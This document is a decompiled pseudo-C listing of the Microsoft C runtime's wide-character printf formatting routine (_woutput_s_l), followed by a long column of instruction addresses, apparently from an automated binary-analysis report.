    																						E00B809F0(_t567, _t588, _t672, _t673,  &M00B77C38, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
    																						 *(_t674 - 0x4c8) = 0xffffffff;
    																						E00B7C650(_t674 - 0x40);
    																						_t504 =  *(_t674 - 0x4c8);
    																						L225:
    																						return E00B805D0(_t504, _t567,  *(_t674 - 0x48) ^ _t674, _t642, _t672, _t673);
    																					}
    																				}
    																			}
    																			L215:
    																			if( *(_t674 - 0x45c) == 0 ||  *(_t674 - 0x45c) == 7) {
    																				 *(_t674 - 0x4f8) = 1;
    																			} else {
    																				 *(_t674 - 0x4f8) = 0;
    																			}
    																			_t642 =  *(_t674 - 0x4f8);
    																			 *(_t674 - 0x4bc) =  *(_t674 - 0x4f8);
    																			if( *(_t674 - 0x4bc) == 0) {
    																				_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
    																				_push(0);
    																				_push(0x8f5);
    																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																				_push(2);
    																				_t509 = L00B7D760();
    																				_t677 = _t677 + 0x14;
    																				if(_t509 == 1) {
    																					asm("int3");
    																				}
    																			}
    																			if( *(_t674 - 0x4bc) != 0) {
    																				 *(_t674 - 0x4d4) =  *(_t674 - 0x44c);
    																				E00B7C650(_t674 - 0x40);
    																				_t504 =  *(_t674 - 0x4d4);
    																			} else {
    																				 *((intOrPtr*)(L00B80C60(_t580))) = 0x16;
    																				E00B809F0(_t567, _t580, _t672, _t673, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
    																				 *(_t674 - 0x4d0) = 0xffffffff;
    																				E00B7C650(_t674 - 0x40);
    																				_t504 =  *(_t674 - 0x4d0);
    																			}
    																			goto L225;
    																		}
    																		L188:
    																		if(( *(_t674 - 0x10) & 0x00000040) != 0) {
    																			if(( *(_t674 - 0x10) & 0x00000100) == 0) {
    																				if(( *(_t674 - 0x10) & 0x00000001) == 0) {
    																					if(( *(_t674 - 0x10) & 0x00000002) != 0) {
    																						 *((short*)(_t674 - 0x14)) = 0x20;
    																						 *(_t674 - 0x1c) = 1;
    																					}
    																				} else {
    																					 *((short*)(_t674 - 0x14)) = 0x2b;
    																					 *(_t674 - 0x1c) = 1;
    																				}
    																			} else {
    																				 *((short*)(_t674 - 0x14)) = 0x2d;
    																				 *(_t674 - 0x1c) = 1;
    																			}
    																		}
    																		 *((intOrPtr*)(_t674 - 0x4ac)) =  *((intOrPtr*)(_t674 - 0x18)) -  *((intOrPtr*)(_t674 - 0x24)) -  *(_t674 - 0x1c);
    																		if(( *(_t674 - 0x10) & 0x0000000c) == 0) {
    																			E00B971B0(0x20,  *((intOrPtr*)(_t674 - 0x4ac)),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
    																			_t677 = _t677 + 0x10;
    																		}
    																		E00B971F0( *(_t674 - 0x1c), _t674 - 0x14,  *(_t674 - 0x1c),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
    																		_t677 = _t677 + 0x10;
    																		if(( *(_t674 - 0x10) & 0x00000008) != 0 && ( *(_t674 - 0x10) & 0x00000004) == 0) {
    																			E00B971B0(0x30,  *((intOrPtr*)(_t674 - 0x4ac)),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
    																			_t677 = _t677 + 0x10;
    																		}
    																		if( *(_t674 - 0xc) != 0 ||  *((intOrPtr*)(_t674 - 0x24)) <= 0) {
    																			L208:
    																			E00B971F0( *((intOrPtr*)(_t674 - 0x24)),  *((intOrPtr*)(_t674 - 4)),  *((intOrPtr*)(_t674 - 0x24)),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
    																			_t677 = _t677 + 0x10;
    																			goto L209;
    																		} else {
    																			L202:
    																			 *((intOrPtr*)(_t674 - 0x4b0)) =  *((intOrPtr*)(_t674 - 4));
    																			 *((intOrPtr*)(_t674 - 0x4b4)) =  *((intOrPtr*)(_t674 - 0x24));
    																			while(1) {
    																				L203:
    																				 *((intOrPtr*)(_t674 - 0x4b4)) =  *((intOrPtr*)(_t674 - 0x4b4)) - 1;
    																				if( *((intOrPtr*)(_t674 - 0x4b4)) <= 0) {
    																					break;
    																				}
    																				L204:
    																				_t537 = E00B7C680(_t674 - 0x40);
    																				_t541 = E00B90E50(_t674 - 0x458,  *((intOrPtr*)(_t674 - 0x4b0)),  *((intOrPtr*)( *((intOrPtr*)(E00B7C680(_t674 - 0x40))) + 0xac)), _t537);
    																				_t677 = _t677 + 0x10;
    																				 *((intOrPtr*)(_t674 - 0x4b8)) = _t541;
    																				if( *((intOrPtr*)(_t674 - 0x4b8)) > 0) {
    																					L206:
    																					E00B97150( *(_t674 - 0x458) & 0x0000ffff,  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
    																					_t677 = _t677 + 0xc;
    																					 *((intOrPtr*)(_t674 - 0x4b0)) =  *((intOrPtr*)(_t674 - 0x4b0)) +  *((intOrPtr*)(_t674 - 0x4b8));
    																					continue;
    																				}
    																				L205:
    																				 *(_t674 - 0x44c) = 0xffffffff;
    																				break;
    																			}
    																			L207:
    																			L209:
    																			if( *(_t674 - 0x44c) >= 0 && ( *(_t674 - 0x10) & 0x00000004) != 0) {
    																				E00B971B0(0x20,  *((intOrPtr*)(_t674 - 0x4ac)),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
    																				_t677 = _t677 + 0x10;
    																			}
    																			goto L212;
    																		}
    																		L65:
    																		__eax =  *(__ebp - 0x454) & 0x0000ffff;
    																		 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
    																		__ecx =  *(__ebp - 0x4ec);
    																		__ecx =  *(__ebp - 0x4ec) - 0x41;
    																		 *(__ebp - 0x4ec) = __ecx;
    																	} while ( *(__ebp - 0x4ec) > 0x37);
    																	__edx =  *(__ebp - 0x4ec);
    																	_t143 = __edx + 0xb97110; // 0xcccccc0d
    																	__eax =  *_t143 & 0x000000ff;
    																	switch( *((intOrPtr*)(( *_t143 & 0x000000ff) * 4 +  &M00B970D4))) {
    																		case 0:
    																			L120:
    																			 *(__ebp - 0x2c) = 1;
    																			 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
    																			 *(__ebp - 0x454) = __ax;
    																			goto L121;
    																		case 1:
    																			L67:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																			}
    																			goto L69;
    																		case 2:
    																			L82:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																			}
    																			goto L84;
    																		case 3:
    																			L143:
    																			 *((intOrPtr*)(__ebp - 0x460)) = 7;
    																			goto L145;
    																		case 4:
    																			L75:
    																			__eax = __ebp + 0x14;
    																			 *(__ebp - 0x474) = E00B93D50(__ebp + 0x14);
    																			if( *(__ebp - 0x474) == 0) {
    																				L77:
    																				__edx =  *0xd121a0; // 0xb775a0
    																				 *(__ebp - 4) = __edx;
    																				__eax =  *(__ebp - 4);
    																				 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																				L81:
    																				goto L187;
    																			}
    																			L76:
    																			__ecx =  *(__ebp - 0x474);
    																			if( *((intOrPtr*)( *(__ebp - 0x474) + 4)) != 0) {
    																				L78:
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
    																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
    																					 *(__ebp - 0xc) = 0;
    																					__edx =  *(__ebp - 0x474);
    																					__eax =  *(__edx + 4);
    																					 *(__ebp - 4) =  *(__edx + 4);
    																					__ecx =  *(__ebp - 0x474);
    																					__edx =  *__ecx;
    																					 *(__ebp - 0x24) =  *__ecx;
    																				} else {
    																					__edx =  *(__ebp - 0x474);
    																					__eax =  *(__edx + 4);
    																					 *(__ebp - 4) =  *(__edx + 4);
    																					__ecx =  *(__ebp - 0x474);
    																					__eax =  *__ecx;
    																					asm("cdq");
    																					 *__ecx - __edx =  *__ecx - __edx >> 1;
    																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
    																					 *(__ebp - 0xc) = 1;
    																				}
    																				goto L81;
    																			}
    																			goto L77;
    																		case 5:
    																			L121:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			__edx = __ebp - 0x448;
    																			 *(__ebp - 4) = __ebp - 0x448;
    																			 *(__ebp - 0x44) = 0x200;
    																			if( *(__ebp - 0x30) >= 0) {
    																				L123:
    																				if( *(__ebp - 0x30) != 0) {
    																					L126:
    																					if( *(__ebp - 0x30) > 0x200) {
    																						 *(__ebp - 0x30) = 0x200;
    																					}
    																					L128:
    																					if( *(__ebp - 0x30) > 0xa3) {
    																						__ecx =  *(__ebp - 0x30);
    																						__ecx =  *(__ebp - 0x30) + 0x15d;
    																						 *(__ebp - 0x20) = L00B7DEA0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
    																						if( *(__ebp - 0x20) == 0) {
    																							 *(__ebp - 0x30) = 0xa3;
    																						} else {
    																							__edx =  *(__ebp - 0x20);
    																							 *(__ebp - 4) =  *(__ebp - 0x20);
    																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
    																						}
    																					}
    																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																					__edx =  *(__ebp + 0x14);
    																					__eax =  *(__edx - 8);
    																					__ecx =  *(__edx - 4);
    																					 *(__ebp - 0x490) =  *(__edx - 8);
    																					 *(__ebp - 0x48c) =  *(__edx - 4);
    																					__ecx = __ebp - 0x40;
    																					_push(E00B7C680(__ebp - 0x40));
    																					__edx =  *(__ebp - 0x2c);
    																					_push( *(__ebp - 0x2c));
    																					__eax =  *(__ebp - 0x30);
    																					_push( *(__ebp - 0x30));
    																					__ecx =  *(__ebp - 0x454);
    																					_push( *(__ebp - 0x454));
    																					__edx =  *(__ebp - 0x44);
    																					_push( *(__ebp - 0x44));
    																					__eax =  *(__ebp - 4);
    																					_push( *(__ebp - 4));
    																					__ecx = __ebp - 0x490;
    																					_push(__ebp - 0x490);
    																					__edx =  *0xd12188; // 0xddc09d6c
    																					E00B849C0(__edx) =  *__eax();
    																					__esp = __esp + 0x1c;
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																					if(( *(__ebp - 0x10) & 0x00000080) != 0 &&  *(__ebp - 0x30) == 0) {
    																						__ecx = __ebp - 0x40;
    																						_push(E00B7C680(__ebp - 0x40));
    																						__ecx =  *(__ebp - 4);
    																						_push( *(__ebp - 4));
    																						__edx =  *0xd12194; // 0xddc09d6c
    																						E00B849C0(__edx) =  *__eax();
    																						__esp = __esp + 8;
    																					}
    																					__eax =  *(__ebp - 0x454) & 0x0000ffff;
    																					if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
    																							__ecx = __ebp - 0x40;
    																							_push(E00B7C680(__ebp - 0x40));
    																							__edx =  *(__ebp - 4);
    																							_push( *(__ebp - 4));
    																							__eax =  *0xd12190; // 0xddc09d6c
    																							__eax =  *__eax();
    																							__esp = __esp + 8;
    																						}
    																					}
    																					__ecx =  *(__ebp - 4);
    																					__edx =  *( *(__ebp - 4));
    																					if( *( *(__ebp - 4)) == 0x2d) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
    																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
    																					}
    																					__edx =  *(__ebp - 4);
    																					 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																					goto L187;
    																				}
    																				L124:
    																				__eax =  *(__ebp - 0x454) & 0x0000ffff;
    																				if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
    																					goto L126;
    																				}
    																				L125:
    																				 *(__ebp - 0x30) = 1;
    																				goto L128;
    																			}
    																			L122:
    																			 *(__ebp - 0x30) = 6;
    																			goto L128;
    																		case 6:
    																			L69:
    																			 *(__ebp - 0xc) = 1;
    																			__ebp + 0x14 = E00B93D50(__ebp + 0x14);
    																			 *(__ebp - 0x458) = __ax;
    																			__ecx =  *(__ebp - 0x10);
    																			__ecx =  *(__ebp - 0x10) & 0x00000020;
    																			if(__ecx == 0) {
    																				 *(__ebp - 0x448) =  *(__ebp - 0x458);
    																			} else {
    																				 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
    																				 *(__ebp - 0x470) = __dl;
    																				 *((char*)(__ebp - 0x46f)) = 0;
    																				__ecx = __ebp - 0x40;
    																				__eax = E00B7C680(__ebp - 0x40);
    																				__ecx = __ebp - 0x40;
    																				E00B7C680(__ebp - 0x40) =  *__eax;
    																				__ecx =  *(__ebp - 0x448 + 0xac);
    																				__edx = __ebp - 0x470;
    																				__eax = __ebp - 0x448;
    																				if(E00B90E50(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448) < 0) {
    																					 *(__ebp - 0x28) = 1;
    																				}
    																			}
    																			__edx = __ebp - 0x448;
    																			 *(__ebp - 4) = __ebp - 0x448;
    																			 *(__ebp - 0x24) = 1;
    																			goto L187;
    																		case 7:
    																			goto L0;
    																		case 8:
    																			L106:
    																			__eax = __ebp + 0x14;
    																			 *(__ebp - 0x484) = E00B93D50(__ebp + 0x14);
    																			if(E00B97280() != 0) {
    																				L116:
    																				__ecx =  *(__ebp - 0x10);
    																				__ecx =  *(__ebp - 0x10) & 0x00000020;
    																				if(__ecx == 0) {
    																					__ecx =  *(__ebp - 0x484);
    																					__edx =  *(__ebp - 0x44c);
    																					 *__ecx =  *(__ebp - 0x44c);
    																				} else {
    																					__edx =  *(__ebp - 0x484);
    																					__ax =  *(__ebp - 0x44c);
    																					 *( *(__ebp - 0x484)) = __ax;
    																				}
    																				 *(__ebp - 0x28) = 1;
    																				goto L187;
    																			}
    																			L107:
    																			__ecx = 0;
    																			if(0 == 0) {
    																				 *(__ebp - 0x4f4) = 0;
    																			} else {
    																				 *(__ebp - 0x4f4) = 1;
    																			}
    																			__edx =  *(__ebp - 0x4f4);
    																			 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
    																			if( *(__ebp - 0x488) == 0) {
    																				_push(L"(\"\'n\' format specifier disabled\", 0)");
    																				_push(0);
    																				_push(0x695);
    																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																				_push(2);
    																				__eax = L00B7D760();
    																				__esp = __esp + 0x14;
    																				if(__eax == 1) {
    																					asm("int3");
    																				}
    																			}
    																			if( *(__ebp - 0x488) != 0) {
    																				L115:
    																				goto L187;
    																			} else {
    																				L114:
    																				 *((intOrPtr*)(L00B80C60(__ecx))) = 0x16;
    																				__eax = E00B809F0(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
    																				 *(__ebp - 0x4cc) = 0xffffffff;
    																				__ecx = __ebp - 0x40;
    																				__eax = E00B7C650(__ecx);
    																				__eax =  *(__ebp - 0x4cc);
    																				goto L225;
    																			}
    																		case 9:
    																			L148:
    																			 *(__ebp - 8) = 8;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
    																			}
    																			goto L150;
    																		case 0xa:
    																			L142:
    																			 *(__ebp - 0x30) = 8;
    																			goto L143;
    																		case 0xb:
    																			L84:
    																			if( *(__ebp - 0x30) != 0xffffffff) {
    																				__edx =  *(__ebp - 0x30);
    																				 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
    																			} else {
    																				 *(__ebp - 0x4f0) = 0x7fffffff;
    																			}
    																			__eax =  *(__ebp - 0x4f0);
    																			 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
    																			__ecx = __ebp + 0x14;
    																			 *(__ebp - 4) = E00B93D50(__ebp + 0x14);
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																			if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																				L98:
    																				if( *(__ebp - 4) == 0) {
    																					__ecx =  *0xd121a4; // 0xb77590
    																					 *(__ebp - 4) = __ecx;
    																				}
    																				 *(__ebp - 0xc) = 1;
    																				__edx =  *(__ebp - 4);
    																				 *(__ebp - 0x480) =  *(__ebp - 4);
    																				while(1) {
    																					L101:
    																					__eax =  *(__ebp - 0x47c);
    																					__ecx =  *(__ebp - 0x47c);
    																					__ecx =  *(__ebp - 0x47c) - 1;
    																					 *(__ebp - 0x47c) = __ecx;
    																					if( *(__ebp - 0x47c) == 0) {
    																						break;
    																					}
    																					L102:
    																					__edx =  *(__ebp - 0x480);
    																					__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
    																					if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
    																						break;
    																					}
    																					L103:
    																					 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
    																					 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
    																				}
    																				L104:
    																				 *(__ebp - 0x480) =  *(__ebp - 0x480) -  *(__ebp - 4);
    																				__edx =  *(__ebp - 0x480) -  *(__ebp - 4) >> 1;
    																				 *(__ebp - 0x24) =  *(__ebp - 0x480) -  *(__ebp - 4) >> 1;
    																				goto L105;
    																			} else {
    																				L88:
    																				if( *(__ebp - 4) == 0) {
    																					__eax =  *0xd121a0; // 0xb775a0
    																					 *(__ebp - 4) = __eax;
    																				}
    																				__ecx =  *(__ebp - 4);
    																				 *(__ebp - 0x478) = __ecx;
    																				 *(__ebp - 0x24) = 0;
    																				while(1) {
    																					L92:
    																					__eax =  *(__ebp - 0x24);
    																					if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
    																						break;
    																					}
    																					L93:
    																					__ecx =  *(__ebp - 0x478);
    																					__edx =  *__ecx;
    																					if( *__ecx == 0) {
    																						break;
    																					}
    																					L94:
    																					__ecx = __ebp - 0x40;
    																					E00B7C680(__ebp - 0x40) =  *(__ebp - 0x478);
    																					__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
    																					if(E00B91090( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478)) != 0) {
    																						 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    																						 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    																					}
    																					 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    																					 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    																					 *(__ebp - 0x24) =  *(__ebp - 0x24) + 1;
    																					 *(__ebp - 0x24) =  *(__ebp - 0x24) + 1;
    																				}
    																				L97:
    																				L105:
    																				goto L187;
    																			}
    																		case 0xc:
    																			L141:
    																			 *(__ebp - 8) = 0xa;
    																			goto L150;
    																		case 0xd:
    																			L144:
    																			 *((intOrPtr*)(__ebp - 0x460)) = 0x27;
    																			L145:
    																			 *(__ebp - 8) = 0x10;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																				__edx = 0x30;
    																				 *((short*)(__ebp - 0x14)) = __dx;
    																				 *((intOrPtr*)(__ebp - 0x460)) =  *((intOrPtr*)(__ebp - 0x460)) + 0x51;
    																				 *(__ebp - 0x12) = __ax;
    																				 *(__ebp - 0x1c) = 2;
    																			}
    																			goto L150;
    																		case 0xe:
    																			goto L187;
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}




























    0x00b96a5b
    0x00b96a5b
    0x00b96a5b
    0x00b96a5b
    0x00b96a61
    0x00b96a64
    0x00000000
    0x00b96ae2
    0x00000000
    0x00b96ae2
    0x00000000
    0x00b96ae2
    0x00b96ae2
    0x00b96aea
    0x00b96b0c
    0x00b96b12
    0x00b96b37
    0x00b96b7e
    0x00b96b81
    0x00b96ba2
    0x00b96ba7
    0x00b96bac
    0x00b96bb2
    0x00b96b83
    0x00b96b87
    0x00b96b8c
    0x00b96b8f
    0x00b96b90
    0x00b96b96
    0x00b96b96
    0x00b96b39
    0x00b96b3c
    0x00b96b3f
    0x00b96b61
    0x00b96b66
    0x00b96b6c
    0x00b96b6d
    0x00b96b73
    0x00b96b41
    0x00b96b45
    0x00b96b4a
    0x00b96b4e
    0x00b96b4f
    0x00b96b55
    0x00b96b55
    0x00b96b79
    0x00b96b14
    0x00b96b18
    0x00b96b1d
    0x00b96b20
    0x00b96b26
    0x00b96b26
    0x00b96aec
    0x00b96af0
    0x00b96af5
    0x00b96af8
    0x00b96afe
    0x00b96afe
    0x00b96bbe
    0x00b96c00
    0x00b96c06
    0x00b96c12
    0x00000000
    0x00b96bc0
    0x00b96bc0
    0x00b96bc0
    0x00b96bc7
    0x00000000
    0x00b96bd4
    0x00b96bd4
    0x00b96be2
    0x00b96be7
    0x00b96bed
    0x00b96bfb
    0x00b96c18
    0x00b96c20
    0x00b96c42
    0x00b96c42
    0x00b96c4c
    0x00b96c5d
    0x00b96c67
    0x00b96c69
    0x00b96c69
    0x00b96c4e
    0x00b96c4e
    0x00b96c4e
    0x00b96c7c
    0x00b96c7e
    0x00b96c7e
    0x00b96c8b
    0x00b96c8e
    0x00b96c8e
    0x00b96c94
    0x00b96c97
    0x00b96c9c
    0x00000000
    0x00000000
    0x00b96cac
    0x00b96caf
    0x00b96cb9
    0x00b96cc8
    0x00b96cd1
    0x00b96ce7
    0x00b96ced
    0x00b96cfa
    0x00b96d08
    0x00b96d08
    0x00b96d17
    0x00b96d1f
    0x00b96d1f
    0x00b96d27
    0x00b96d30
    0x00b96d39
    0x00b96d45
    0x00b96d5e
    0x00b96d64
    0x00b96d6d
    0x00b96d6d
    0x00000000
    0x00b96d70
    0x00000000
    0x00b96d70
    0x00000000
    0x00b96d70
    0x00000000
    0x00b96d70
    0x00000000
    0x00b96d70
    0x00000000
    0x00b96d70
    0x00000000
    0x00b96d70
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00b96f50
    0x00b96f54
    0x00b96f5c
    0x00b96f61
    0x00b96f64
    0x00b96f64
    0x00b96f6b
    0x00b96f6b
    0x00b960eb
    0x00b960f2
    0x00b960ff
    0x00b96104
    0x00000000
    0x00b96117
    0x00b96121
    0x00b96148
    0x00b9612f
    0x00b96140
    0x00b96140
    0x00b96121
    0x00b96152
    0x00b96158
    0x00b96164
    0x00b96167
    0x00b96175
    0x00b96178
    0x00b96185
    0x00b9622a
    0x00b96230
    0x00b9623d
    0x00000000
    0x00000000
    0x00b96243
    0x00b96249
    0x00000000
    0x00b96250
    0x00b96250
    0x00b9626a
    0x00b9626f
    0x00000000
    0x00000000
    0x00b96277
    0x00b96277
    0x00b9627e
    0x00b96281
    0x00b96284
    0x00b96287
    0x00b9628a
    0x00b9628d
    0x00b96290
    0x00b96297
    0x00b9629e
    0x00000000
    0x00000000
    0x00b962aa
    0x00b962aa
    0x00b962b1
    0x00b962bd
    0x00b962c0
    0x00b962cd
    0x00000000
    0x00000000
    0x00b962cf
    0x00b962d5
    0x00b962d5
    0x00b962dc
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b96320
    0x00b96320
    0x00b9632a
    0x00b96357
    0x00b96361
    0x00b96361
    0x00b96365
    0x00b9632c
    0x00b9632c
    0x00b96338
    0x00b9633f
    0x00b96344
    0x00b96347
    0x00b9634a
    0x00b9634d
    0x00b9634f
    0x00b9634f
    0x00b96352
    0x00000000
    0x00000000
    0x00b9636d
    0x00b9636d
    0x00000000
    0x00000000
    0x00b96379
    0x00b96379
    0x00b96383
    0x00b963a3
    0x00b963a6
    0x00b963b0
    0x00b963b0
    0x00b963b4
    0x00b96385
    0x00b96385
    0x00b96391
    0x00b96398
    0x00b9639a
    0x00b9639a
    0x00b963a1
    0x00000000
    0x00000000
    0x00b963bc
    0x00b963bc
    0x00b963c3
    0x00b963cf
    0x00b963d2
    0x00b963df
    0x00b964f2
    0x00000000
    0x00b964f2
    0x00b963e5
    0x00b963eb
    0x00b963eb
    0x00b963f2
    0x00000000
    0x00b96429
    0x00b96429
    0x00b9642c
    0x00b96432
    0x00b96459
    0x00b96459
    0x00b9645c
    0x00b96462
    0x00b96486
    0x00b96486
    0x00b96489
    0x00b9648f
    0x00b964c8
    0x00b964d9
    0x00000000
    0x00b964d9
    0x00b96491
    0x00b96491
    0x00b96494
    0x00b9649a
    0x00000000
    0x00000000
    0x00b9649c
    0x00b9649c
    0x00b9649f
    0x00b964a5
    0x00000000
    0x00000000
    0x00b964a7
    0x00b964a7
    0x00b964aa
    0x00b964b0
    0x00000000
    0x00000000
    0x00b964b2
    0x00b964b2
    0x00b964b5
    0x00b964bb
    0x00000000
    0x00000000
    0x00b964bd
    0x00b964bd
    0x00b964c0
    0x00b964c6
    0x00b964ca
    0x00000000
    0x00b964ca
    0x00000000
    0x00b964c6
    0x00b96464
    0x00b96464
    0x00b96467
    0x00b9646e
    0x00000000
    0x00b96470
    0x00b96473
    0x00b96476
    0x00b9647c
    0x00b96481
    0x00000000
    0x00b96481
    0x00b9646e
    0x00b96434
    0x00b96434
    0x00b96437
    0x00b9643e
    0x00000000
    0x00b96440
    0x00b96443
    0x00b96446
    0x00b9644c
    0x00b96451
    0x00000000
    0x00b96451
    0x00000000
    0x00b964db
    0x00b964db
    0x00b964de
    0x00b964e1
    0x00000000
    0x00000000
    0x00b963f9
    0x00b963f9
    0x00b963fc
    0x00b96402
    0x00b9641e
    0x00b96421
    0x00b96404
    0x00b96404
    0x00b96407
    0x00b9640a
    0x00b96410
    0x00b96416
    0x00b96416
    0x00000000
    0x00000000
    0x00b964e6
    0x00b964e9
    0x00b964ef
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b962f9
    0x00b962f9
    0x00b962fc
    0x00b962ff
    0x00000000
    0x00000000
    0x00b96304
    0x00b96307
    0x00b9630d
    0x00000000
    0x00000000
    0x00b962ee
    0x00b962f1
    0x00b962f4
    0x00000000
    0x00000000
    0x00b962e3
    0x00b962e6
    0x00b962e9
    0x00000000
    0x00000000
    0x00b96312
    0x00b96315
    0x00b96318
    0x00000000
    0x00000000
    0x00b9631b
    0x00000000
    0x00000000
    0x00b9618b
    0x00b9618b
    0x00b9618d
    0x00b9619b
    0x00b9618f
    0x00b9618f
    0x00b9618f
    0x00b961ab
    0x00b961b8
    0x00b961ba
    0x00b961bf
    0x00b961c1
    0x00b961c6
    0x00b961cb
    0x00b961cd
    0x00b961d2
    0x00b961d8
    0x00b961da
    0x00b961da
    0x00b961d8
    0x00b961db
    0x00b961e2
    0x00000000
    0x00b961e4
    0x00b961e9
    0x00b96205
    0x00b9620d
    0x00b9621a
    0x00b9621f
    0x00b97034
    0x00b97041
    0x00b97041
    0x00b961e2
    0x00b96185
    0x00b96f70
    0x00b96f77
    0x00b96f8e
    0x00b96f82
    0x00b96f82
    0x00b96f82
    0x00b96f98
    0x00b96f9e
    0x00b96fab
    0x00b96fad
    0x00b96fb2
    0x00b96fb4
    0x00b96fb9
    0x00b96fbe
    0x00b96fc0
    0x00b96fc5
    0x00b96fcb
    0x00b96fcd
    0x00b96fcd
    0x00b96fcb
    0x00b96fd5
    0x00b97020
    0x00b97029
    0x00b9702e
    0x00b96fd7
    0x00b96fdc
    0x00b96ff8
    0x00b97000
    0x00b9700d
    0x00b97012
    0x00b97012
    0x00000000
    0x00b96fd5
    0x00b96d7a
    0x00b96d80
    0x00b96d8a
    0x00b96da4
    0x00b96dbe
    0x00b96dc5
    0x00b96dc9
    0x00b96dc9
    0x00b96da6
    0x00b96dab
    0x00b96daf
    0x00b96daf
    0x00b96d8c
    0x00b96d91
    0x00b96d95
    0x00b96d95
    0x00b96d8a
    0x00b96dd9
    0x00b96de5
    0x00b96dfb
    0x00b96e00
    0x00b96e00
    0x00b96e16
    0x00b96e1b
    0x00b96e24
    0x00b96e42
    0x00b96e47
    0x00b96e47
    0x00b96e4e
    0x00b96f08
    0x00b96f1b
    0x00b96f20
    0x00000000
    0x00b96e5e
    0x00b96e5e
    0x00b96e61
    0x00b96e6a
    0x00b96e70
    0x00b96e70
    0x00b96e7f
    0x00b96e87
    0x00000000
    0x00000000
    0x00b96e89
    0x00b96e8c
